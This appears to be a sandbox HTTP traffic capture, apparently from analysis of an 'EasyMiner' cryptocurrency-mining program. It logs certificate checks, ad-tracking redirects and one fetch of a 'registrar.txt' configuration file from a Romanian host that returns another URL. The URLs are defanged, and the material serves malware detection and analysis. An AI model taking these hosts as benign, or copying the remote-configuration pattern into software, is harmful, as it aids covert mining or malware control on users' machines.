GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEGmHlBnZ42JwdJ275Z3GaF4= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.ws.symantec.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1736

content-transfer-encoding: binary

Cache-Control: max-age=348366, public, no-transform, must-revalidate

Last-Modified: Tue, 18 Jul 2017 15:51:16 GMT

Expires: Tue, 25 Jul 2017 15:51:16 GMT

Date: Fri, 21 Jul 2017 15:06:31 GMT

Connection: keep-alive
0..........0..... .....0......0...0........t...~.v.....`..C.d..2017071
8155116Z0s0q0I0... ........?`r.....@by..M.E.. ....w.iHG.S.....2v......
.i.....bpt.....h^....20170718155116Z....20170725155116Z0...*.H........
.....s.......Qmz..(...z.0:...$...W..a.}.1.I.e.h..4..J..j.(.V.9..iK.TG.
P.$i.w....$........2.|..>o"......$..1.N1.....4T...go.GF`.<s....=
F...Y.;...q....AI.....p....*.....{z.? ]p..........V.YT.SR...=.........
...0.........,.u<II.9.;.V.V.oV...P&..:|M....s.B.....5E6gi....0...0.
..0..........c..*.:Y......Yk`0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008 Ve
riSign, Inc. - For authorized use only1806..U.../VeriSign Universal Ro
ot Certification Authority0...161122000000Z..171214235959Z0..1.0...U..
..US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network11
0/..U...(Symantec Universal Root OCSP Responder 50.."0...*.H..........
...0..........F8$-..E....?.T....D...h..~...9.......0.....f@1...M...F..
e.5c.V.....r....ox.l..:t....,......6R..E.g...'oTB....`E 7...uz.;(B...~
Z=T..^nC.sp....4<\..@.../}G ...1.gj,^.^.t.2X.....)k.\u...../(-]!./.
&.vm....O..p.r5.I.N..xnd_.g....h..d ..4...8.-..r....g..'p.............
0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://www
.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-OFF-530...U........t...~.v.....`..C.d0...U.#..0....w.iHG.S.....2v...
..0...*.H.............b.....D.o.[...M.1.....i:.Y.5%e..q..[......O <<< skipped >>>

GET /bounce?/getuid?http%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D%24UID%26bid%3D2cr76e1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ib.adnxs.com

Connection: Keep-Alive

Cookie: sess=1; uuid2=6436859416475074122


HTTP/1.1 302 Found

Server: nginx/1.11.5

Date: Fri, 21 Jul 2017 15:05:44 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Cache-Control: no-store, no-cache, private

Pragma: no-cache

Expires: Sat, 15 Nov 2008 16:00:00 GMT

P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

X-XSS-Protection: 0

Access-Control-Allow-Credentials: true

Access-Control-Allow-Origin: *

Location: hXXp://ps.eyeota.net/match?uid=6436859416475074122&bid=2cr76e1

AN-X-Request-Uuid: ebc0aa83-bf76-4d9a-be0e-7a7d61c0f42f

Set-Cookie: sess=1; Path=/; Max-Age=86400; Expires=Sat, 22-Jul-2017 15:05:44 GMT; Domain=.adnxs.com; HttpOnly

Set-Cookie: uuid2=6436859416475074122; Path=/; Max-Age=7776000; Expires=Thu, 19-Oct-2017 15:05:44 GMT; Domain=.adnxs.com; HttpOnly

X-Proxy-Origin: 194.242.96.218; 194.242.96.218; 308.bm-nginx-loadbalancer.mgmt.ams1; *.adnxs.com; 185.33.221.41:80
HTTP/1.1 302 Found..Server: nginx/1.11.5..Date: Fri, 21 Jul 2017 15:05
:44 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 0..Co
nnection: keep-alive..Cache-Control: no-store, no-cache, private..Prag
ma: no-cache..Expires: Sat, 15 Nov 2008 16:00:00 GMT..P3P: policyref="
hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSD
o OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"..X-XSS-Protection: 0..A
ccess-Control-Allow-Credentials: true..Access-Control-Allow-Origin: *.
.Location: hXXp://ps.eyeota.net/match?uid=6436859416475074122&bid=2cr7
6e1..AN-X-Request-Uuid: ebc0aa83-bf76-4d9a-be0e-7a7d61c0f42f..Set-Cook
ie: sess=1; Path=/; Max-Age=86400; Expires=Sat, 22-Jul-2017 15:05:44 G
MT; Domain=.adnxs.com; HttpOnly..Set-Cookie: uuid2=6436859416475074122
; Path=/; Max-Age=7776000; Expires=Thu, 19-Oct-2017 15:05:44 GMT; Doma
in=.adnxs.com; HttpOnly..X-Proxy-Origin: 194.242.96.218; 194.242.96.21
8; 308.bm-nginx-loadbalancer.mgmt.ams1; *.adnxs.com; 185.33.221.41:80.
.<<< skipped >>>

GET /track/cmf/generic?ttd_pid=eyeota&ttd_tpi=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: match.adsrvr.org

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: private,no-cache, must-revalidate

Content-Type: text/html

Date: Fri, 21 Jul 2017 15:05:37 GMT

Location: hXXp://match.adsrvr.org/track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:38 GMT; path=/

Set-Cookie: TDCPM=CAEYBSgCMgsIyKH71ZWVqDUQBTgB; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:38 GMT; path=/

X-AspNet-Version: 4.0.30319

Content-Length: 163

Connection: keep-alive
Redirecting to: <a href="hXXp://match.adsrvr.org/track/cmb/generic?
ttd_pid=eyeota&ttd_tpi=1">hXXp://match.adsrvr.org/track/cmb/generic
?ttd_pid=eyeota&ttd_tpi=1</a>HTTP/1.1 302 Found..Cache-Control: 
private,no-cache, must-revalidate..Content-Type: text/html..Date: Fri,
 21 Jul 2017 15:05:37 GMT..Location: hXXp://match.adsrvr.org/track/cmb
/generic?ttd_pid=eyeota&ttd_tpi=1..P3P: CP="NOI DSP COR CUR ADMo DEVo 
PSAo PSDo OUR SAMo BUS UNI NAV"..Pragma: no-cache..Server: Microsoft-I
IS/8.5..Set-Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; domain=
.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:38 GMT; path=/..Set-Cookie
: TDCPM=CAEYBSgCMgsIyKH71ZWVqDUQBTgB; domain=.adsrvr.org; expires=Sat,
 21-Jul-2018 15:05:38 GMT; path=/..X-AspNet-Version: 4.0.30319..Conten
t-Length: 163..Connection: keep-alive..Redirecting to: <a href="htt
p://match.adsrvr.org/track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1">ht
tp://match.adsrvr.org/track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1</a
>....
<<< skipped >>>

GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=%2Chttp%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D16918e61-6e26-11e7-8451-005056a24356%26bid%3D6bnoi0v HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: match.adsrvr.org

Connection: Keep-Alive

Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; TDCPM=CAESFQoGZXllb3RhEgsImq2XpP6UqDUQBRgFIAEoAjILCMih-9WVlag1EAU4AQ..


HTTP/1.1 302 Found

Cache-Control: private,no-cache, must-revalidate

Content-Type: text/html

Date: Fri, 21 Jul 2017 15:05:35 GMT

Location: hXXp://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&ttd_puid=,http://ps.eyeota.net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:36 GMT; path=/

Set-Cookie: TDCPM=CAESFQoGZXllb3RhEgsImq2XpP6UqDUQBRIUCgV0YXBhZBILCN6D85X_lKg1EAUYASABKAIyCwje-_XClZWoNRAFOAFaBXRhcGFkYAI.; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:36 GMT; path=/

X-AspNet-Version: 4.0.30319

Content-Length: 469

Connection: keep-alive
Redirecting to: <a href="hXXp://pixel.tapad.com/idsync/ex/receive?p
artner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&
ttd_puid=,http://ps.eyeota.net/match?uid=16918e61-6e26-1
1e7-8451-005056a24356&bid=6bnoi0v">hXXp://pixel.tapad.com/idsyn
c/ex/receive?partner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec
-324c93cd1abd&ttd_puid=,http://ps.eyeota.net/match?uid=1
6918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v</a>HTTP/1.1 
302 Found..Cache-Control: private,no-cache, must-revalidate..Content-T
ype: text/html..Date: Fri, 21 Jul 2017 15:05:35 GMT..Location: hXXp://
pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=d0
758d3b-c6d8-453b-b2ec-324c93cd1abd&ttd_puid=,http://ps.eyeota.
net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi
0v..P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
..Pragma: no-cache..Server: Microsoft-IIS/8.5..Set-Cookie: TDID=d0758d
3b-c6d8-453b-b2ec-324c93cd1abd; domain=.adsrvr.org; expires=Sat, 21-Ju
l-2018 15:05:36 GMT; path=/..Set-Cookie: TDCPM=CAESFQoGZXllb3RhEgsImq2
XpP6UqDUQBRIUCgV0YXBhZBILCN6D85X_lKg1EAUYASABKAIyCwje-_XClZWoNRAFOAFaB
XRhcGFkYAI.; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:36 GMT
; path=/..X-AspNet-Version: 4.0.30319..Content-Length: 469..Connection
: keep-alive..Redirecting to: <a href="hXXp://pixel.tapad.com/idsyn
c/ex/receive?partner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec
-324c93cd1abd&ttd_puid=,http://ps.eyeota.net/match?uid<<< skipped >>>

GET /site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=13133386 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tags.bluekai.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:42 GMT

Content-Length: 0

Connection: keep-alive

X-XSS-Protection: 0

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tags.bluekai.com/w3c/p3p.xml"

Set-Cookie: bkdc=phx; expires=Wed, 17-Jan-2018 15:05:42 GMT; path=/; domain=.bluekai.com

Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:05:42 GMT; path=/; domain=.bluekai.com

Location: hXXp://tags.bluekai.com/site/27675?dt=0&r=1573727964&sig=1370858844&bkca=KJhBM1WvQp91CoIZcG5B m3CClPm5 ApiBm0aZtPsCiIdKJBYcdIM8ewEhgSjtVD1ADobygvOkuOXe90OTOs PtVnskcRzAt80woFFd1wxkLUtry9FvlMp8IrRpotsQ5Ph2loMO188UzZUqReNbdTqCvjojzKVatHJF9rTYm8lynw o6i8SRLbxkuAuLNH2GNekr

BK-Server: 2d49
HTTP/1.1 302 Found..Date: Fri, 21 Jul 2017 15:05:42 GMT..Content-Lengt
h: 0..Connection: keep-alive..X-XSS-Protection: 0..P3P: CP="NOI DSP CO
R CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tag
s.bluekai.com/w3c/p3p.xml"..Set-Cookie: bkdc=phx; expires=Wed, 17-Jan-
2018 15:05:42 GMT; path=/; domain=.bluekai.com..Set-Cookie: bku=sty99W
RRzkZJtxWL; expires=Wed, 17-Jan-2018 15:05:42 GMT; path=/; domain=.blu
ekai.com..Location: hXXp://tags.bluekai.com/site/27675?dt=0&r=15737279
64&sig=1370858844&bkca=KJhBM1WvQp91CoIZcG5B m3CClPm5 ApiBm0aZtPsCiIdKJ
BYcdIM8ewEhgSjtVD1ADobygvOkuOXe90OTOs PtVnskcRzAt80woFFd1wxkLUtry9FvlM
p8IrRpotsQ5Ph2loMO188UzZUqReNbdTqCvjojzKVatHJF9rTYm8lynw o6i8SRLbxkuAu
LNH2GNekr..BK-Server: 2d49......


GET /site/29539?limit=1&id=2Mo5g13cxp1RQR_Y0XPNVnAI1Fexng56KcfA9OuNEbrM HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tags.bluekai.com

Connection: Keep-Alive

Cookie: bkdc=phx; bku=sty99WRRzkZJtxWL


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:57 GMT

Content-Length: 0

Connection: keep-alive

X-XSS-Protection: 0

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tags.bluekai.com/w3c/p3p.xml"

Pragma: no-cache

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Cache-Control: max-age=0, no-cache, no-store

Location: hXXps://match.adsrvr.org/track/cmf/generic?ttd_pid=bluekai

Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:05:57 GMT; path=/; domain=.bluekai.com

BK-Server: 795f
HTTP/1.1 302 Found..Date: Fri, 21 Jul 2017 15:05:57 GMT..Content-Lengt
h: 0..Connection: keep-alive..X-XSS-Protection: 0..P3P: CP="NOI DSP CO
R CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tag
s.bluekai.com/w3c/p3p.xml"..Pragma: no-cache..Expires: Thu, 01 Dec 199
4 16:00:00 GMT..Cache-Control: max-age=0, no-cache, no-store..Location
: hXXps://match.adsrvr.org/track/cmf/generic?ttd_pid=bluekai..Set-Cook
ie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:05:57 GMT; path=
/; domain=.bluekai.com..BK-Server: 795f......


GET /site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=46412811 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tags.bluekai.com

Connection: Keep-Alive

Cookie: bkdc=phx; bku=sty99WRRzkZJtxWL


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:26 GMT

Content-Type: image/gif

Content-Length: 62

Connection: keep-alive

X-XSS-Protection: 0

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tags.bluekai.com/w3c/p3p.xml"

Pragma: no-cache

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Cache-Control: max-age=0, no-cache, no-store

Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:06:26 GMT; path=/; domain=.bluekai.com

BK-Server: 3f4e

GIF89a.............!..NETSCAPE2.0.....!.......,...........L..;HTTP/1.1
 200 OK..Date: Fri, 21 Jul 2017 15:06:26 GMT..Content-Type: image/gif.
.Content-Length: 62..Connection: keep-alive..X-XSS-Protection: 0..P3P:
 CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policy
ref="hXXp://tags.bluekai.com/w3c/p3p.xml"..Pragma: no-cache..Expires: 
Thu, 01 Dec 1994 16:00:00 GMT..Cache-Control: max-age=0, no-cache, no-
store..Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:0
6:26 GMT; path=/; domain=.bluekai.com..BK-Server: 3f4e..GIF89a........
.....!..NETSCAPE2.0.....!.......,...........L..;..

GET /ct/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu&_test=WXIYRgAAAGbcCHPP HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync-tm.everesttech.net

Connection: Keep-Alive

Cookie: everest_g_v2=g_surferid~WXIYRgAAAGbcCHPP


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:42 GMT

Pragma: no-cache

Cache-Control: no-cache

Expires: Fri, 21 Jul 2017 10:05:42 -05:00

P3P: CP="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"

Access-Control-Allow-Origin: *

Location: hXXp://ps.eyeota.net/match?uid=WXIYRgAAAGbcCHPP&bid=0rijhbu

Connection: close

Server: Jetty(9.3.8.v20160314)

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86402

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT

If-None-Match: "8017f9a85f10d21:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/vnd.ms-cab-compressed

Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT

Accept-Ranges: bytes

ETag: "80f83df077e4d21:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 52967

Date: Fri, 21 Jul 2017 15:05:48 GMT

Connection: keep-alive

X-CCC: UA

X-CID: 2
MSCF............,...................I..................J.` .authroot.s
tl.^R.Y.6..CK...8...........].y.Q..!Jv..%k.....!..DH...B.KBWE.(.f.RQ*.
..f...}'.....x.:.{f...|.s.q..CF.......0....{%i......P.F.yNz:A..L..1..3
...........IG.....4=....~."|..s.|.xuT..._.*.....e.h,....ozs..*.!TmS..A
q... |,.....V..xV....^....FE(.x...N..h...b....y...j.!....7..h. ..@.(V.
.....8..`-..#=.jq'.e...|..X...@...{..rj.d.....?n3.L.......S.......:.O.
.."k.!o......`.l.B 1.....#].....k6.........B.......!P$.A..<..?zk...
.~..P)A0tu....x..-X..E..,a.7,xN..eed.3..L..XT......IG.w_.Y....E....~k.
.X...T.V.g7d.....#.&~.f.O....Dh...x0..J...0..u.dF..P.!..d...%x<!...
....@,...0..3..-.....q.....X.e....A...z.'..2.<.m.f...I.9.z..a.6vo..
 ...P..U7...-.0.Q..<zd!V....=.'.....2H;..5.7.%5PsD.#.....ht%......f
..s.Dp..Lklx%[.!c...I.<...f.<..e.k`......^.......X..?Z...?......
?..I}..5V.v .q.c.9j..Y..J..0U.t./%..Jd @.W.u......U.".)C(........T.4.y
..J.57*^HlY....O|..~\.J]..]e...?..x2c..6.....i.=?x.....N..-X..f"^@'...
.-v..v...7j.Y1.5._v.....*S9.."........%E<E...;p.}........0..P....g.
.@.]E.3........K....K.4V..Q.-,.../.........:.A....Ng,.........BFef.[..
. ..."*...^...L._#:,7..6:.z..!a............E.r>......A....#..c.....
rS.......7.D..JdR.`6.|...>.0....Wf..n..^..8x.4..........-.3y,3.C.(.
...9f...iNK....q....sUq....c...c.....*K.8"..D...<..0............*x,
$x....a....]..p..t.M....6F..u.....p.r.kf...Z......h~.B3...[.....Hc...K
.....I.....%F..:.....N....U..eU........ e. k....3(S..h....1..r..Z.Y...
.....A.i..Z....[%J.....=2"v].....L.P..!........PC*.........j 8.~.)<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT

Accept-Ranges: bytes

ETag: "80b4b9e9dc5d01:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

X-Powered-By: ASP.NET

Content-Length: 1213

Date: Fri, 21 Jul 2017 15:06:25 GMT

Connection: keep-alive

X-CCC: UA

X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008 
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal 
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z...<<< skipped >>>

GET /stats/0.php?3635752&@f16&@g1&@h1&@i1&@j1500649540706&@k0&@l1&@mHome Mining cryptocoins made the easy way&@n0&@o1000&@q0&@r0&@s0&@ten-us&@u1276&@vhttp://easyminer.net/&@w HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: s4.histats.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:41 GMT

Content-Type: text/html;charset=UTF-8

Content-Length: 379

Connection: close

Set-Cookie: CountUid=766d510c-53vg-493c-bdfb-306b8946da39; domain=.histats.com; Max-Age=31536000; Expires=Sat, 21-Jul-2018 15:05:41 GMT
_HST_cntval="#3Vis. today=435";chfh2(_HST_cntval);;!function(){try{var
 b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid
=5200&site=1&l=" encodeURIComponent(window.location.href) "&j=" encode
URIComponent(document.referrer);.b.async="async";b.type="text/javascri
pt";var a=document.getElementsByTagName("script")[0];a.parentNode.inse
rtBefore(b,a);}catch(e){}}();..

GET /easyminer/registrar.txt HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600,public, must-revalidate, proxy-revalidate

Expires: Fri, 21 Jul 2017 16:06:06 GMT

Last-Modified: Mon, 21 Dec 2015 12:11:41 GMT

Content-Type: text/plain

Content-Length: 31

Date: Fri, 21 Jul 2017 15:06:06 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

%hXXp://openradiodirectory.com/..

GET /cm?pub=24472&in=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: p.rfihub.com

Connection: Keep-Alive


HTTP/1.1 302 Found

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

Set-Cookie: eud=H4sIAAAAAAAAALvFwmtoamBgZmJpampkYmQAAEbBHkkQAAAA;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-2018 15:05:52 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Set-Cookie: rud=H4sIAAAAAAAAAOMSMjO2NLUwNDUytTCzsDAwNDEyFuIz1DVKd8lKdQ_JrAquCJPiNTQ1MDAzsTQ1NTIxtAQAulCyUjMAAAA;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-2018 15:05:52 GMT

Set-Cookie: ruds=H4sIAAAAAAAAAOMSMjO2NLUwNDUytTCzsDAwNDEyFuIz1DVKd8lKdQ_JrAquCAMAwS61WCQAAAA;Path=/;Domain=.rfihub.com

Location: hXXp://ps.eyeota.net/match?uid=639581525868801423&bid=omt9pi0

Content-Length: 0
HTTP/1.1 302 Found..P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI C
OM NAV INT"..Set-Cookie: eud=H4sIAAAAAAAAALvFwmtoamBgZmJpampkYmQAAEbBH
kkQAAAA;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-2018 15:05:52 GM
T..Expires: Thu, 01 Jan 1970 00:00:00 GMT..Set-Cookie: rud=H4sIAAAAAAA
AAOMSMjO2NLUwNDUytTCzsDAwNDEyFuIz1DVKd8lKdQ_JrAquCJPiNTQ1MDAzsTQ1NTIxt
AQAulCyUjMAAAA;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-2018 15:0
5:52 GMT..Set-Cookie: ruds=H4sIAAAAAAAAAOMSMjO2NLUwNDUytTCzsDAwNDEyFuI
z1DVKd8lKdQ_JrAquCAMAwS61WCQAAAA;Path=/;Domain=.rfihub.com..Location: 
hXXp://ps.eyeota.net/match?uid=639581525868801423&bid=omt9pi0..Content
-Length: 0..

GET /stats/e.php?3635752&@Ab&@R34189&@w HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: s4.histats.com

Connection: Keep-Alive

Cookie: CountUid=766d510c-53vg-493c-bdfb-306b8946da39


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:25 GMT

Content-Type: text/html;charset=UTF-8

Content-Length: 379

Connection: close
_HST_cntval="#3Vis. today=435";chfh2(_HST_cntval);;!function(){try{var
 b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid
=5200&site=1&l=" encodeURIComponent(window.location.href) "&j=" encode
URIComponent(document.referrer);.b.async="async";b.type="text/javascri
pt";var a=document.getElementsByTagName("script")[0];a.parentNode.inse
rtBefore(b,a);}catch(e){}}();..

GET /insync?vxii_pid=12&vxii_rcid=6e04aa6a-78bd-4ddc-a7ef-3c5e57d34ffb&vxii_pid1=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: in.v12group.com

Connection: Keep-Alive

